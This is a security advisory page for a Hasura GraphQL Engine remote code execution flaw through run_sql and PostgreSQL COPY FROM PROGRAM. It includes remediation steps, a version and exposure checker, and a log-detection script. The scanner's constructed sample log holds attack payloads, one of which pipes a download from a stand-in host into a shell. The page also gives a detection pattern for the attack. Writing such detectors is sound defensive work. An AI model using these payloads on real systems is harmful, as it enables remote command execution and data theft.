CVE-2021-47748

9.8 CRITICAL

📋 TL;DR

CVE-2021-47748 is a critical remote code execution vulnerability in Hasura GraphQL Engine. An attacker who can reach the engine's run_sql API (an admin-only raw SQL passthrough, not a GraphQL query) can submit a PostgreSQL COPY ... FROM PROGRAM statement, which makes the database server run an arbitrary shell command as the operating-system account that PostgreSQL runs under. Organizations running Hasura GraphQL Engine 1.3.3 or earlier are affected; an instance started without an admin secret treats every caller as admin, so run_sql is then open to anyone who can reach the port.

💻 Affected Systems

Products:
  • Hasura GraphQL Engine
Versions: Versions up to and including 1.3.3
Operating Systems: All platforms running Hasura GraphQL Engine
Default Config Vulnerable: ⚠️ Yes
Notes: run_sql is only available to the admin role. An instance started without HASURA_GRAPHQL_ADMIN_SECRET treats every request as admin, so in that (default) configuration no credentials are needed; otherwise the attacker needs the admin secret. The command itself executes on the PostgreSQL host, and PostgreSQL only allows COPY FROM PROGRAM for superusers and members of pg_execute_server_program, so the privileges of the database role Hasura connects with decide whether the attack succeeds.

📦 What is this software?

Hasura GraphQL Engine is an open-source server that exposes a GraphQL API over a PostgreSQL database. Alongside the GraphQL endpoint it serves an admin metadata API used by the console and by migrations; run_sql is the part of that API that forwards raw SQL to the configured database.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Arbitrary command execution on the database host as the operating-system account that runs PostgreSQL. If Hasura connects as a PostgreSQL superuser, which is often the case, the attacker can read and modify any data, read files the PostgreSQL account can access, deploy ransomware, and pivot to other systems reachable from the database server.

🟠

Likely Case

The attacker obtains a shell on the database server with the privileges of the PostgreSQL service account, then exfiltrates data, harvests credentials (the database's own credentials and any secrets in files or environment readable by that account), and installs persistence.

🟢

If Mitigated

If Hasura connects with a database role that is neither a superuser nor a member of pg_execute_server_program, PostgreSQL rejects COPY FROM PROGRAM and the attacker is limited to running SQL with that role's privileges. Network segmentation of the database host then limits what a compromise of the database server can reach.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires the admin role. An instance started without an admin secret grants admin to every request, and an attacker who obtains the admin secret (leaked in client code, CI logs, or a shared console session) needs nothing else. Non-admin roles cannot call run_sql.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.3.4 and later

Vendor Advisory: https://github.com/hasura/graphql-engine/security/advisories/GHSA-4w2f-88mj-8w5f

Restart Required: Yes

Instructions:

1. Update Hasura GraphQL Engine to version 1.3.4 or later.
2. Restart the Hasura service.
3. Verify the update by requesting GET /v1/version and confirming that it reports 1.3.4 or later.

🔧 Temporary Workarounds

Disable run_sql endpoint

Applies to: all

Remove or restrict access to run_sql if it is not required for operations. It is used by the console's data tab and by migrations, so expect those to stop working while the workaround is in place.

Start the engine with the metadata API (the API that serves run_sql) removed from HASURA_GRAPHQL_ENABLED_APIS, for example enabling only graphql, and set HASURA_GRAPHQL_ADMIN_SECRET so that any admin API left enabled requires a secret.

Network segmentation

Applies to: all

Restrict network access to Hasura GraphQL Engine and to the PostgreSQL server to trusted sources only; never expose the engine to the internet without an admin secret.

Configure firewall rules to limit access to the Hasura port (8080 by default) and to the PostgreSQL port (5432 by default).

🧯 If You Can't Patch

  • Implement strict network access controls to limit exposure of Hasura GraphQL Engine, and make sure HASURA_GRAPHQL_ADMIN_SECRET is set on every instance
  • Connect Hasura to PostgreSQL as a role that is neither a superuser nor a member of pg_execute_server_program (or pg_read_server_files / pg_write_server_files); PostgreSQL then refuses COPY FROM PROGRAM regardless of what run_sql passes through
  • Disable or restrict run_sql (the metadata API) where it is not needed

🔍 How to Verify

Check if Vulnerable:

Check whether the Hasura GraphQL Engine version is 1.3.3 or earlier, whether run_sql is reachable without an admin secret, and whether the database role Hasura connects with is a superuser or a member of pg_execute_server_program (if it is neither, the COPY FROM PROGRAM payload fails at the database).

Check Version:

curl -s http://localhost:8080/v1/version

Verify Fix Applied:

Verify that the Hasura GraphQL Engine version is 1.3.4 or later. On a non-production copy, confirm that a run_sql request containing COPY ... FROM PROGRAM with a harmless command is rejected, and that a request without the admin secret is refused.
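The following script, added here as an example (it is not Hasura's tooling or part of the advisory), automates the version check and the "is run_sql reachable without a secret" check. It assumes the Hasura 1.x endpoints GET /v1/version and POST /v1/query (the API that carries run_sql requests) and the documented behaviour that an instance without an admin secret treats every caller as admin; the probe only sends a harmless SELECT 1, never a COPY FROM PROGRAM.

```python
#!/usr/bin/env python3
"""Check a Hasura GraphQL Engine instance for CVE-2021-47748 exposure.

Added example; not Hasura's own tooling. It assumes Hasura 1.x endpoints
GET /v1/version and POST /v1/query (the API that carries run_sql requests)
and that an instance started without an admin secret treats every caller
as admin. The probe sends a harmless "SELECT 1", never COPY FROM PROGRAM.

Usage: python3 hasura_check.py http://localhost:8080 [admin-secret]
"""
import itertools
import json
import sys
import urllib.error
import urllib.request

FIXED_IN = (1, 3, 4)  # first release the advisory lists as fixed


def parse_version(text):
    """Split a Hasura version string ('v1.3.3', 'v1.3.4-beta.1') into a numeric
    (major, minor, patch) tuple plus a flag for a pre-release suffix."""
    s = text.strip()
    if s[:1] in ("v", "V"):
        s = s[1:]
    core, sep, _tag = s.partition("-")
    nums = []
    for part in core.split("."):
        digits = "".join(itertools.takewhile(str.isdigit, part))
        nums.append(int(digits) if digits else 0)
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums[:3]), bool(sep)


def is_vulnerable_version(text):
    """True for anything below 1.3.4. A pre-release of 1.3.4 itself is treated
    as vulnerable (conservative: the advisory only names 1.3.4 as fixed)."""
    core, prerelease = parse_version(text)
    return core < FIXED_IN or (core == FIXED_IN and prerelease)


def classify_probe(status):
    """Interpret the HTTP status of an unauthenticated run_sql probe."""
    if 200 <= status < 300:
        return "OPEN: run_sql accepted without an admin secret"
    if status in (401, 403):
        return "PROTECTED: admin secret enforced"
    return "UNKNOWN: unexpected status %d (metadata API disabled?)" % status


def fetch_version(base_url):
    with urllib.request.urlopen(base_url.rstrip("/") + "/v1/version", timeout=10) as r:
        return json.load(r)["version"]


def probe_run_sql(base_url, admin_secret=None):
    """POST a harmless run_sql request and return the HTTP status code."""
    body = json.dumps({"type": "run_sql", "args": {"sql": "SELECT 1"}}).encode()
    headers = {"Content-Type": "application/json"}
    if admin_secret:
        headers["X-Hasura-Admin-Secret"] = admin_secret
    req = urllib.request.Request(base_url.rstrip("/") + "/v1/query",
                                 data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.status
    except urllib.error.HTTPError as e:
        return e.code  # 401/403 etc. are the interesting answers, not errors


def main(argv):
    if len(argv) < 2:
        print(__doc__)
        return 2
    base = argv[1]
    secret = argv[2] if len(argv) > 2 else None
    version = fetch_version(base)
    print("version:", version,
          "(VULNERABLE)" if is_vulnerable_version(version) else "(patched)")
    print("unauthenticated run_sql:", classify_probe(probe_run_sql(base)))
    if secret:
        print("run_sql with secret:", classify_probe(probe_run_sql(base, secret)))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

A "VULNERABLE" version together with an "OPEN" probe is the worst case: anyone who can reach the port can run the exploit. "PROTECTED" only means the admin secret is enforced; the instance still needs the upgrade, because anyone holding the secret can exploit it.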

📡 Detection & Monitoring

Log Indicators:

  • run_sql requests whose SQL contains COPY ... FROM PROGRAM (or COPY ... TO PROGRAM); expect case changes and SQL comments between the keywords, not only the literal string
  • Multiple failed authentication attempts against the admin APIs (run_sql), which indicate admin-secret guessing
  • COPY ... PROGRAM statements in PostgreSQL server logs (visible when statement logging is enabled) and unexpected child processes of the PostgreSQL server process

Network Indicators:

  • Unusual traffic to the run_sql endpoint, in particular from source addresses that never use the console or migrations
  • Outbound connections from the database server (where the command actually runs) to unexpected destinations

SIEM Query:

source="hasura" AND uri_path="/v1/*" AND query="*COPY*PROGRAM*"

An exact match on "COPY FROM PROGRAM" never fires, because the logged field holds the whole statement (table name, quoting, comments) around the keywords; match on a wildcard pattern and then review the hits.
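Where no SIEM is in front of the logs, the same check can be run directly over Hasura's JSON log output. The script below is an added example, not part of the advisory or of Hasura; it assumes the Hasura 1.x http-log layout (type=http-log, detail.http_info.url and ip, detail.operation.query carrying the request body) and the sample log lines it ships with are constructed, not captured from a real incident. It descends into bulk requests, tolerates comments between the keywords, and ignores GraphQL requests that merely mention the string.

```python
#!/usr/bin/env python3
"""Scan Hasura structured (JSON) logs for run_sql requests that use
PostgreSQL's COPY ... FROM PROGRAM / TO PROGRAM, the primitive behind
CVE-2021-47748.

Added example; not part of the advisory or of Hasura. It assumes the
Hasura 1.x http-log layout (type=http-log, detail.http_info.url/ip,
detail.operation.query holding the request body). The SAMPLE_LOG lines
are constructed for this example, not captured from a real incident.

Usage: python3 hasura_runsql_detect.py /var/log/hasura.log
       (with no argument it scans the built-in constructed sample)
"""
import json
import re
import sys

# COPY ... FROM PROGRAM or COPY ... TO PROGRAM, any case, with whitespace or
# /* */ comments allowed between the keywords (a common filter evasion).
_SEP = r"(?:\s|/\*.*?\*/)+"
PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(?:FROM|TO)" + _SEP + r"PROGRAM\b",
    re.IGNORECASE | re.DOTALL,
)


def run_sql_statements(query):
    """Collect every SQL string in a run_sql request, descending into
    'bulk' wrappers so a run_sql hidden inside a batch is not missed."""
    found = []
    if not isinstance(query, dict):
        return found
    if query.get("type") == "run_sql":
        sql = query.get("args", {}).get("sql")
        if isinstance(sql, str):
            found.append(sql)
    elif query.get("type") == "bulk":
        for child in query.get("args", []):
            found.extend(run_sql_statements(child))
    return found


def scan(lines):
    """Return one alert dict per run_sql statement that invokes PROGRAM."""
    alerts = []
    for lineno, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except ValueError:
            continue  # non-JSON noise: skip rather than abort the scan
        if rec.get("type") != "http-log":
            continue
        detail = rec.get("detail", {})
        op = detail.get("operation", {})
        for sql in run_sql_statements(op.get("query")):
            if PROGRAM_RE.search(sql):
                info = detail.get("http_info", {})
                alerts.append({
                    "line": lineno,
                    "ip": info.get("ip"),
                    "url": info.get("url"),
                    "role": op.get("user_vars", {}).get("x-hasura-role"),
                    "sql": sql,
                })
    return alerts


def _rec(url, query, ip="203.0.113.9", role="admin"):
    """Build one constructed http-log line in the assumed Hasura layout."""
    return json.dumps({
        "type": "http-log", "timestamp": "2021-10-05T12:00:00.000+0000",
        "level": "info",
        "detail": {
            "operation": {"request_id": "r1", "user_vars": {"x-hasura-role": role},
                          "query": query},
            "http_info": {"status": 200, "url": url, "ip": ip, "method": "POST"},
        },
    })


SAMPLE_LOG = [  # constructed sample data, not real traffic
    _rec("/v1/query", {"type": "run_sql", "args": {"sql": "SELECT count(*) FROM users"}}),
    _rec("/v1/query", {"type": "run_sql",
                       "args": {"sql": "COPY t FROM PROGRAM 'id > /tmp/o'"}}),
    _rec("/v1/query", {"type": "bulk", "args": [
        {"type": "run_sql", "args": {"sql": "create table t(x text)"}},
        {"type": "run_sql", "args": {"sql": "copy t from/**/program 'curl http://198.51.100.7/x|sh'"}},
    ]}),
    # a GraphQL request whose string literal mentions the keywords is not run_sql
    _rec("/v1/graphql", {"query": 'query { posts(where: {body: {_eq: "COPY FROM PROGRAM"}}) { id } }'}),
    _rec("/v1/query", {"type": "run_sql", "args": {"sql": "COPY users TO STDOUT"}}),
    "not json at all",
]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as f:
            alerts = scan(f)
    else:
        alerts = scan(SAMPLE_LOG)
    for a in alerts:
        print("line %(line)d  ip=%(ip)s  role=%(role)s  url=%(url)s\n    %(sql)s" % a)
```

Against the constructed sample it reports lines 2 and 3 only: the plain COPY FROM PROGRAM, and the comment-obfuscated variant inside a bulk request. The benign run_sql lines, the COPY to STDOUT, the GraphQL query that merely contains the string, and the malformed line produce nothing.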
